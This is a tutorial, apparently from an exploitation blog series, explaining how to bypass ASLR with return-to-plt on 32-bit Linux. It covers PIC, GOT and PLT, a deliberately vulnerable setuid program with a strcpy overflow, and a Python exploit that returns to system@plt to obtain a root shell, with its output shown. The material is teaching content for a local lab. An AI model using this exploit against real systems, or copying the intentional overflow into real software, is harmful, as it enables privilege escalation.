Bypassing ASLR – Part I

Prerequisite:

  1. Classic Stack Based Buffer Overflow

VM Setup: Ubuntu 12.04 (x86)

In previous posts, we saw that an attacker needs to know

  • stack address (to jump to shellcode)
  • libc base address (to successfully bypass NX bit)

in order to exploit vulnerable code. To thwart the attacker, security researchers came up with an exploit mitigation called “ASLR”!!

What is ASLR?

Address space layout randomization (ASLR) is an exploit mitigation technique that randomizes

  • Stack address.
  • Heap address.
  • Shared library address.

Once the above addresses are randomized, in particular the shared library address, the approach we took to bypass the NX bit won’t work, since the attacker needs to know the libc base address. But this mitigation technique is not completely foolproof, so in this post let’s see how to bypass shared library address randomization!!

We already know from the previous post’s exp.py that a libc function address was calculated as follows:

libc function address = libc base address + function offset

where

  • libc base address was constant (0xb7e22000 – for our ‘vuln’ binary) since randomization was turned off.
  • function offset was also constant (obtained from “readelf -s libc.so.6 | grep “)
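The formula above can be checked with a minimal Python sketch. The base address is the one quoted for ‘vuln’; the offset is a made-up placeholder (a real one comes from the readelf output), and the helper name is only illustrative.

```python
# Sketch of: libc function address = libc base address + function offset
LIBC_BASE = 0xb7e22000        # base quoted above (randomization turned off)
EXAMPLE_OFFSET = 0x0003f430   # HYPOTHETICAL offset, for illustration only


def libc_function_address(base, offset):
    """Return the absolute 32-bit address of a libc function."""
    return (base + offset) & 0xffffffff


if __name__ == "__main__":
    address = libc_function_address(LIBC_BASE, EXAMPLE_OFFSET)
    print("0x%08x" % address)
```

With randomization turned off, both inputs are constants, which is why the earlier exploit could hard-code the result.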

Now when we turn on full randomization (using the command below, as root)

#echo 2 > /proc/sys/kernel/randomize_va_space

the libc base address gets randomized.
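To confirm which mode is active, the same file can be read back. The following is a small sketch for Linux only; the function names are my own, and the mode descriptions summarise the kernel’s documented meaning of the values 0, 1 and 2.

```python
# Read the kernel's ASLR setting (Linux only) and describe it.
import os

ASLR_PATH = "/proc/sys/kernel/randomize_va_space"

ASLR_MODES = {
    0: "off: no randomization",
    1: "partial: stack, mmap base (shared libraries) and VDSO randomized",
    2: "full: as mode 1, plus the brk-based heap",
}


def describe_aslr(value):
    """Map a randomize_va_space value to a human-readable description."""
    return ASLR_MODES.get(value, "unknown value %r" % (value,))


def read_aslr_setting(path=ASLR_PATH):
    """Return the current setting as an int, or None if the file is missing."""
    if not os.path.exists(path):
        return None
    with open(path) as handle:
        return int(handle.read().strip())


if __name__ == "__main__":
    setting = read_aslr_setting()
    if setting is None:
        print("randomize_va_space is not available on this system")
    else:
        print("%d -> %s" % (setting, describe_aslr(setting)))
```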

NOTE: Only the libc base address is randomized; the offset of a particular function from that base always remains constant!! Hence if we can bypass shared library base address randomization, vulnerable programs can be exploited successfully (using the three techniques below) even when ASLR is turned on!!

  • Return-to-plt (this post)
  • Brute force (part 2)
  • GOT overwrite and GOT dereference (part 3)

What is return-to-plt?

In this technique, instead of returning to a libc function (whose address is randomized), the attacker returns to a function’s PLT stub (whose address is NOT randomized, since the executable itself is not position independent; it is known before execution). Since ‘function@PLT’ is not randomized, the attacker no longer needs to predict the libc base address and can simply return to ‘function@PLT’ in order to invoke ‘function’.

What is PLT, and how does invoking ‘function@PLT’ invoke ‘function’?

To understand the Procedure Linkage Table (PLT), let me first briefly describe shared libraries!!

Unlike static libraries, a shared library’s text segment is shared among multiple processes, while its data segment is unique to each process. This reduces memory and disk usage. Since the text segment is shared among multiple processes, it should have only Read and eXecute permissions, and hence the dynamic linker cannot relocate a data symbol or a function address present inside the text segment (there is no write permission to it). Then how does the dynamic linker relocate shared library symbols at runtime without modifying the text segment? It’s done using PIC!!

What is PIC?

Position Independent Code (PIC) was developed to address this issue. It makes sure that a shared library’s text segment stays shared among multiple processes even though relocation is performed at load time. PIC achieves this with a level of indirection: the text segment doesn’t contain absolute virtual addresses for global symbol and function references; instead, those references point to a specific table in the data segment. This table is the placeholder for the absolute virtual addresses of global symbols and functions, and the dynamic linker fills it in as part of relocation. Thus during relocation only the data segment is modified and the text segment remains intact!!

The dynamic linker relocates global symbols and functions found in PIC in two different ways, as described below:

  • Global Offset Table (GOT): The global offset table contains a 4-byte entry for each global variable, and that entry holds the variable’s address. When an instruction in the code segment refers to a global variable, it points to an entry in the GOT instead of using the variable’s absolute virtual address. This GOT entry is relocated by the dynamic linker when the shared library is loaded. Thus PIC uses this table to relocate global symbols with a single level of indirection.
  • Procedure Linkage Table (PLT): The procedure linkage table contains stub code for each global function. A call instruction in the text segment doesn’t call the function (‘function’) directly; instead it calls the stub code (‘function@PLT’). On the first invocation, this stub code resolves the function’s address with the help of the dynamic linker, and the address is copied into the GOT (GOT[n]). On later calls, the stub (‘function@PLT’) doesn’t invoke the dynamic linker again; it reads the function’s address directly from GOT[n] and jumps to it. Thus PIC uses this table to relocate function addresses with two levels of indirection.
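The PLT behaviour described above can be modelled in a few lines of Python. This is only a toy model: the class, the dictionary standing in for the shared library, and the resolver are all illustrative names, not how the real dynamic linker is implemented.

```python
# Toy model of lazy binding through a PLT stub and its GOT entry.
# Every name here is illustrative; this is NOT how ld.so is implemented.

def libc_printf(text):
    """Stand-in for the real function living in the shared library."""
    return "printf called with %r" % (text,)


SHARED_LIBRARY = {"printf": libc_printf}   # symbol table of the "library"
resolver_calls = []                        # one entry per dynamic-linker call


class PltEntry(object):
    def __init__(self, symbol):
        self.symbol = symbol
        # Before the first call, the GOT slot points back into the stub,
        # i.e. at the code that asks the dynamic linker for help.
        self.got_slot = self._resolve_and_call

    def _resolve_and_call(self, *args):
        resolver_calls.append(self.symbol)
        target = SHARED_LIBRARY[self.symbol]   # dynamic linker lookup
        self.got_slot = target                 # patch GOT[n]
        return target(*args)

    def __call__(self, *args):
        # Equivalent of "jmp *GOT[n]": always jump through the GOT slot.
        return self.got_slot(*args)


printf_plt = PltEntry("printf")

if __name__ == "__main__":
    print(printf_plt("first"))    # goes through the resolver
    print(printf_plt("second"))   # jumps straight to libc_printf
    print("resolver ran %d time(s)" % len(resolver_calls))
```

The caller only ever needs to know where `printf_plt` is; where `libc_printf` lives is discovered at call time, which is the property return-to-plt relies on.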

Good, you have read about PIC and understood that it keeps a shared library’s text segment intact, which is what lets that text segment be truly shared among many processes!! But did you ever wonder why on earth an executable’s text segment needs GOT entries or PLT stub code when it is NOT shared with any other process?!? It’s because of a security protection mechanism. Nowadays, text segments are by default given only read and execute permissions and no write permission (R_X). This protection doesn’t allow even the dynamic linker to write to the text segment, so it can’t relocate data symbols or function addresses found inside it. Hence, to allow dynamic linker relocation, executables too need GOT entries and PLT stub code, just like shared libraries!!

Example:

//eg.c
//$gcc -g -o eg eg.c
#include <stdio.h>

int main(int argc, char* argv[]) {
 printf("Hello %s\n", argv[1]);
 return 0;
}

The disassembly below shows that ‘printf’ isn’t invoked directly; instead its corresponding PLT code, ‘printf@PLT’, is invoked.

(gdb) disassemble main
Dump of assembler code for function main:
 0x080483e4 <+0>: push %ebp
 0x080483e5 <+1>: mov %esp,%ebp
 0x080483e7 <+3>: and $0xfffffff0,%esp
 0x080483ea <+6>: sub $0x10,%esp
 0x080483ed <+9>: mov 0xc(%ebp),%eax
 0x080483f0 <+12>: add $0x4,%eax
 0x080483f3 <+15>: mov (%eax),%edx
 0x080483f5 <+17>: mov $0x80484e0,%eax
 0x080483fa <+22>: mov %edx,0x4(%esp)
 0x080483fe <+26>: mov %eax,(%esp)
 0x08048401 <+29>: call 0x8048300 <printf@plt>
 0x08048406 <+34>: mov $0x0,%eax
 0x0804840b <+39>: leave 
 0x0804840c <+40>: ret 
End of assembler dump.
(gdb) disassemble 0x8048300
Dump of assembler code for function printf@plt:
 0x08048300 <+0>: jmp *0x804a000
 0x08048306 <+6>: push $0x0
 0x0804830b <+11>: jmp 0x80482f0
End of assembler dump.
(gdb) 

Before printf’s first invocation, its corresponding GOT entry (0x804a000) points back into the PLT code itself (0x8048306). Thus when printf is invoked for the first time, its address gets resolved with the help of the dynamic linker.

(gdb) x/1xw 0x804a000
0x804a000 <printf@got.plt>: 0x08048306
(gdb)

After printf’s first invocation, its corresponding GOT entry contains the address of printf (as shown below):

(gdb) x/1xw 0x804a000
0x804a000 <printf@got.plt>: 0xb7e6e850
(gdb)
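The two gdb readings can be told apart mechanically. Here is a minimal sketch using the addresses printed above; the 16-byte stub size is read off the printf@plt listing (the last 5-byte jmp starts at +11), and the function name is my own.

```python
# Decide whether a GOT entry has been resolved yet, based on whether it
# still points inside its own PLT stub.
PRINTF_PLT = 0x08048300   # start of printf@plt, from the disassembly
PLT_STUB_SIZE = 16        # stub spans +0 .. +15 in the listing above


def got_entry_state(got_value, plt_stub=PRINTF_PLT, stub_size=PLT_STUB_SIZE):
    """Return 'unresolved' if the GOT value points back into the PLT stub."""
    if plt_stub <= got_value < plt_stub + stub_size:
        return "unresolved"
    return "resolved"


if __name__ == "__main__":
    for value in (0x08048306, 0xb7e6e850):
        print("0x%08x -> %s" % (value, got_entry_state(value)))
```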

NOTE 1: If you want to know more about PLTs and GOTs, check out this blog post!!

NOTE 2: In a separate post, I’ll talk in detail about how a libc function address is resolved dynamically with the help of the dynamic linker. For now, just remember that the two instructions below (part of printf@PLT) are responsible for function address resolution!!

 0x08048306 <+6>: push $0x0
 0x0804830b <+11>: jmp 0x80482f0

With this knowledge, we can see that the attacker doesn’t need the exact libc function address to invoke a libc function; he can simply invoke it using the ‘function@PLT’ address (which is known prior to execution).

Vulnerable Code:

#include <stdio.h>
#include <stdlib.h>   /* system(), exit() */
#include <string.h>

/* Even though shell() is never invoked, it is needed here so that the 'system@PLT' and 'exit@PLT' stub code is present in the executable; the exploit relies on those stubs. */
void shell() {
 system("/bin/sh");
 exit(0);
}

int main(int argc, char* argv[]) {
 int i=0;
 char buf[256];
 strcpy(buf,argv[1]);
 printf("%s\n",buf);
 return 0;
}

Compilation Commands:

#echo 2 > /proc/sys/kernel/randomize_va_space
$gcc -g -fno-stack-protector -o vuln vuln.c
$sudo chown root vuln
$sudo chgrp root vuln
$sudo chmod +s vuln

Now, disassembling the executable ‘vuln’, we can find the addresses of ‘system@PLT’ and ‘exit@PLT’:

(gdb) disassemble shell
Dump of assembler code for function shell:
 0x08048474 <+0>: push %ebp
 0x08048475 <+1>: mov %esp,%ebp
 0x08048477 <+3>: sub $0x18,%esp
 0x0804847a <+6>: movl $0x80485a0,(%esp)
 0x08048481 <+13>: call 0x8048380 <system@plt>
 0x08048486 <+18>: movl $0x0,(%esp)
 0x0804848d <+25>: call 0x80483a0 <exit@plt>
End of assembler dump.
(gdb)
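Rather than copying the addresses by hand, they can be pulled out of the gdb listing with a regular expression. The following is a small sketch; the sample text is the two call lines from the disassembly above, and the helper name is illustrative.

```python
# Extract "<name>@plt" call targets from gdb disassembly text.
import re

GDB_OUTPUT = """\
 0x08048481 <+13>: call 0x8048380 <system@plt>
 0x0804848d <+25>: call 0x80483a0 <exit@plt>
"""

CALL_PLT = re.compile(r"call\s+(0x[0-9a-fA-F]+)\s+<(\w+)@plt>")


def plt_addresses(disassembly):
    """Return {function name: PLT stub address} for every call via the PLT."""
    return {name: int(addr, 16) for addr, name in CALL_PLT.findall(disassembly)}


if __name__ == "__main__":
    for name, addr in sorted(plt_addresses(GDB_OUTPUT).items()):
        print("%s@plt = 0x%08x" % (name, addr))
```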

Using these addresses we can write exploit code which bypasses ASLR (and the NX bit)!!

Exploit Code:

#!/usr/bin/env python
#exp.py (Python 2, as shipped with Ubuntu 12.04)
import struct
from subprocess import call

system = 0x8048380
exit = 0x80483a0
system_arg = 0x80485b5     #Obtained from hexdump output of executable 'vuln'

#endianness conversion
def conv(num):
 return struct.pack("<I",num)

# Junk + system + exit + system_arg
buf = "A" * 272
buf += conv(system)
buf += conv(exit)
buf += conv(system_arg)

print "Calling vulnerable program"
call(["./vuln", buf])
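To make the layout of that buffer explicit, here is a sketch that rebuilds the same bytes and reads them back. The constants are the ones from exp.py; the function names are my own, and the comments describe the layout implied by the exploit rather than anything measured independently.

```python
# Rebuild the exp.py payload and show what sits where after the padding.
import struct

SYSTEM_PLT = 0x8048380   # system@plt, from the disassembly of shell()
EXIT_PLT = 0x80483a0     # exit@plt, from the disassembly of shell()
SYSTEM_ARG = 0x80485b5   # string address used by exp.py
PADDING = 272            # junk length used by exp.py


def build_payload():
    payload = b"A" * PADDING
    payload += struct.pack("<I", SYSTEM_PLT)  # lands on main's return address
    payload += struct.pack("<I", EXIT_PLT)    # where system() "returns" to
    payload += struct.pack("<I", SYSTEM_ARG)  # first argument seen by system()
    return payload


def fake_frame(payload):
    """Return (return address, next return address, argument) as integers."""
    return struct.unpack_from("<III", payload, PADDING)


if __name__ == "__main__":
    data = build_payload()
    print("length: %d bytes" % len(data))
    print("frame : " + ", ".join("0x%08x" % word for word in fake_frame(data)))
    # strcpy() stops at the first NUL byte, so the payload must not contain one.
    print("NUL-free: %s" % (b"\x00" not in data))
```

All three addresses live in the executable itself, so none of them changes from run to run even with full randomization turned on.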

Executing exp.py gives us a root shell, as shown below:

$ python exp.py 
Calling vulnerable program
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA������
# id
uid=1000(sploitfun) gid=1000(sploitfun) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),1000(sploitfun)
# exit
$

NOTE: In order to get this root shell, the executable must contain the ‘system@PLT’ and ‘exit@PLT’ stub code. In part III, I will discuss the GOT overwrite and GOT dereference techniques, which help an attacker invoke a libc function even when the required PLT stub is not present in the executable and ASLR is turned on.

